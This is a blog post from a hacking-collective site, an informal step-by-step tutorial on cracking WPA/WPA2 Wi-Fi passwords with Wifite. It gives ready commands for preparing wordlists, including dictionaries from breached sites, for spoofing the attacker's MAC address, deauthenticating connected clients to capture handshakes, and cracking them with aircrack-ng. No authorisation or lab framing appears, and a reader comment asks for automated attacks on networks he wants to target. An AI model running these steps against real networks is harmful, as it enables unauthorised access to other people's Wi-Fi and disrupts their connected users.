Vol.11--No.2019
CyberGuerrilla 2018
Friday,Nov 22,2019 
By r0gu3Sec | April 26, 2018 - 04:30 | Posted in CyberGuerrilla | 1 Comment

Someone asked me recently if I was familiar with the Caffe-Latte attack using Wifite..

This question I think was a little amusing as I love the names that are used…

ChopChop (Chinese dish), coWPAtty (Big B00bs)  😛

 

So I scraped around online and combined some tuts and updated some links

so you can dive into Wifite until you choke 😀

“need to get laid more.. Yes I know.. Thank you for noticing”

Crack WPA/WPA2 with Wifite

Btw.. the Wifite link is to wifite2 source code.. (yes the new one.. Yes I got busted 😉 ..)

Wifite2 is designed specifically for the latest version of Kali’s rolling release (tested on Kali 2017.2, updated Jan 2018).

Other pen-testing distributions (such as BackBox) have outdated versions of the tools used by Wifite; these distributions are not supported.

It is not my attention to write top 10 software list. breaking down complexity in the hope that it will become art for others is where the beauty lies 😉

Intro: Wifite is a Linux based WiFi cracking tool (comes pre-installed on Kali) coded in Python. It is used to automate the hacking process and aims at minimizing the user inputs by scanning and using Python for automation techniques.

Wifite is capable of Hacking WEP, WPA/2 and WPS, but not alone. It actually uses WiFi cracking tools like aircrack-ng, reaver, Tshark, Cowpatty for various purposes like

  • Enabling monitor mode
  • Scanning air
  • Capturing handshake
  • Validating handshake
  • Cracking key
  • analyzing output and captured packets etc.

Guide for installing Wifite’s required programs in Backtrack 5 R1, Ubuntu 11/10, and Debian 6.

Please note that this doesn’t work with WPA Enterprise For that end, you’d have to use an Evil Twin to get the “Enterprise” auth attempt, and then crack it. 

Let’s get started…

Step 1 Get Ready Your Dictionary File

 

First, we’re gonna need a dictionary, to perform the dictionary attack. If the network you’re attacking has WPS enabled, you may attempt to get the password that way first.

Kali Linux provides some Password dictionary files as part  of it’s standard installation.you can find that file /usr/share/wordlists/rockyou.txt.gz

To get it ready for the attack, we need to type:

gzip -d /usr/share/wordlists/rockyou.txt.gz

Backtrack has them located in /pentest/passwords/wordlists. It has one that’s called darkc0de.lst along with the rockyou.txt one.

You can use them simply copying one of this after the ‘-dict’ option.

/pentest/passwords/wordlists/rockyou.txt
/pentest/passwords/wordlists/darkc0de.lst

For any other distros, search for “download wordlist rockyou” or “download wordlist darkc0de”, or just “download wordlist” in DuckDuckGo. It gives more precise results than Google for this kind of stuff.

 

Get more dictionary:

The password inside this file include password’s with more and less then 8 charactersso if you want to use it for WPA2 penetration it’s better to make a dictionary that contain passwords with minimum 8 characters so it become a wpa dictionary To do that type this commend :

12cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > wpa.txt

wpa.txt contains 9606665 passwords that's a huge list.

Now you have a lovely dictionary containing the most used password in the world.
to download new dictionary  to make your list even bigger check those tow website with updated dictionary

http://hashes.org/crackers.php
on Hashes you can find more then 25 Dictionary with a daily updated list

 

https://wiki.skullsecurity.org/Passwords
Here it’s one of the best website i found for password dictionaries with a huge list of dictionaries
to download any of them go to the website, and here you will find many dictionaries to download

These dictionaries that come with some of penetration tools
john.txt.bz2 twitter-banned.txt.bz2 conficker.txt.bz2
500-worst-passwords.txt.bz2 cain.txt.bz2
Again to download any of those go to : https://wiki.skullsecurity.org/Passwords
Leaked passwords dictionaries
those were leaked or stolen from sites
phpbb.txt.bz2 elitehacker.txt.bz2 p0rn-unknown.txt.bz2
myspace.txt.bz2 hak5.txt.bz2 tuscl.txt.bz2
hotmail.txt.bz2 alypaa.txt.bz2 facebook-phished.txt.bz2
faithwriters.txt.bz2 facebook-pastebay.txt.bz2 carders.cc.txt.bz2

again to download any of those go to : https://wiki.skullsecurity.org/Passwords

Step 2 Launch Wifite

To launch Wifite, you must be running with root permissions.

In a live Kali boot, you are logged on by default with the root user. If you let it running for a while (while cracking with the dictionary, pressumably) and it asks for a password to return to the session, it’s ‘toor’ (root backwards).

Same for BackTrack (confirmation needed), and for other distros you can gain root access by typing “su” or “sudo su” and entering the password. The first command requires you to know root’s password, and the second your current account’s and it must have root privileges.

TL;DR? Okay, you just want the command? Here it is!

wifite -mac -aircrack -dict /usr/share/wordlists/rockyou.txt

-mac | Anonymizes your MAC Address by randomizing it (it mustn’t be set to monitor mode, or this command won’t work).

-aircrack | Tells Wifite we’ll be doing an Aircrack only attack.

-dict | Select a dictionary to use for cracking the password after capturing the handshake, otherwise you’ll get the ‘.cap’ file and Wifite will terminate.

 

I have it located in a different folder because I’m not running Kali, but it’s pretty much the same.

Step 3 Select Your Wireless Adapter and Your Target

If you have a laptop, you’ll probably have to choose which adapter to use, if you have an external USB adapter. Please note that you’ll need a compatible adapter that’s able to inject packets and enter into promiscuous mode (monitor mode), or this won’t work.

 

If prompted, we select our adapter choosing the number Wifite has assigned it. In my case, I’ll type ‘1’, because that’s mine. One good indicator for knowing which one it is, is reading that name to the left of phy. For example, I have one that says ‘usb’ in it, and one that doesn’t. And yep, I have it plugged to USB, so that one’s it.

 

Now we’ll see a list of wireless networks, and if we let it run, it will eventually display ‘client’ or ‘clients’ at the top right of the network info, showing that it has a client (or more) connected to it.

To stop the scan, press Ctrl+C. I’ll choose “Casa” (spanish for House).

 

Step 4 Sit and Wait

If the network you’re attempting to crack has WPS enabled, it’ll start cracking it like that first. To stop it, just press Ctrl+C

Now it will attempt to capture the handshake for a few minutes.

If no clients are connected, it’ll send a general deauth to the wireless adapter, so that clients may show up.

If it detects a client connected to the network, it’ll tell you it’s MAC Address, and proceed to send targeted deauths to that client.

When it succeeds deauthenticating a client (who has re-connect enabled by default), or a new client connects to the network, hopefully it will capture the handshake, and it’ll start attempting to crack it with aircrack-ng and the dictionary file you gave it.

If the passphrase is any of the words contained in that dictionary, it’ll stop and show it on screen. Otherwise, it’ll run through the whole dictionary, and say it couldn’t find the key. But it has a nice success rate.

 

I used my country in lowercase letters as the passphrase (argentina), and as it’s along the first words in this dictionary, it took only one second to crack it. For you it may take over an hour or two, depending on your processing power and if the passphrase is near the beginning or the end of the list.

 

Wifite Succeded but Failed!

 

If it failed, you still get the ‘.cap’ file (hopefully not empty).

You can use that file with the same dictionary (or others) with aircrack-ng, using this command:

aircrack-ng -w <location of dictionary> <location of your .cap file>

In Kali live, ‘.cap’ files get saved into a folder named ‘hs’ of the folder you’re standing.

After Wifite has ended, type:

ls ./hs

To see you ‘.cap’ files and other files for cracking.

 

Some More Words

Well, that’s pretty much it. I hope you may find it helpful, but remember to look at OTW guides on Wireless cracking to know exactly what this script is doing, so you may tweak it furthermore or play with its options for more effectivity (type ‘wifite –help’ to see it’s options)

(Visited 2,856 times, 1 visits today)


  • You can follow any responses to this entry through the RSS 2.0 feed.
  • Both comments and pings are currently closed.

This Post is Tagged with:

One Response to Crack WPA/WPA2 with Wifite

  1. Estimado: ¿Hay alguna opcion o algun script que haga lo siguiente en forma automatica?:

    1-Escanear
    2-Elegir automaticamente una red con cliente/s conectado/s y de la que aun no haya un handshake guardado
    3-Intentar desautenticarlo/s
    4-Intentar capturar el handshake y guardarlo indicando el nombre de la red en el nombre del archivo
    5-Volver al punto 1 hasta que presione control-C

    De esta forma no tendria que estar todo el dia esperando a que se conecten clientes a cada una de las redes que me interesa atacar.

    Muchas gracias
    Saludos atentos

    Marcelo

Whoever you are, we are ungovernable! Whoever lays his hand on us to govern us, is a usurper and tyrant, and we declare you our enemy.